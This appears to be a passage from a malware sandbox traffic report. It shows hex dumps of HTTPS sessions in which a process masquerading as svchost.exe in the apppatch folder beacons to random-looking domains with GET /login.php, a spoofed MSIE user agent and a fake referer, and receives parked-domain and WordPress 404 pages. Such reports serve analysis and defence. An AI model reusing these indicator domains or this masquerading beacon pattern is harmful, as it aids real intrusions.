                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e
                                                                                                                                                                                                              Data Ascii: ::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-n
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72
                                                                                                                                                                                                              Data Ascii: ntent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entr
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1369INData Raw: 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79
                                                                                                                                                                                                              Data Ascii: ible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[ty


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.84971975.2.71.1994437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:09 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Etag: "6vifn7jsa919wv"
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Server: awselb/2.0
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              X-Powered-By: Next.js
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                              Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                              Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                              Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                              Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                              Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                              Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                              Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                              Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.849723188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:11 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:12 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1ljoVH9newXjkKfzem65efiD7VUtVQw%2FbOPYzPLMdSt23kXzF%2FtbIgmKTCAc5%2Byf7BXJTWTusSUla5Suuip030zDj1RXhKv3Hve%2FWLL8GYkQN466CylAvuCXjqaMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006a3fc2372aa-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=1353271&cwnd=239&unsent_bytes=0&cid=92f444a8342b0a08&ts=746&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC420INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70
                                                                                                                                                                                                              Data Ascii: yle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta prop
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e
                                                                                                                                                                                                              Data Ascii: on c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.
                                                                                                                                                                                                              2024-11-11 17:33:12 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                              Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
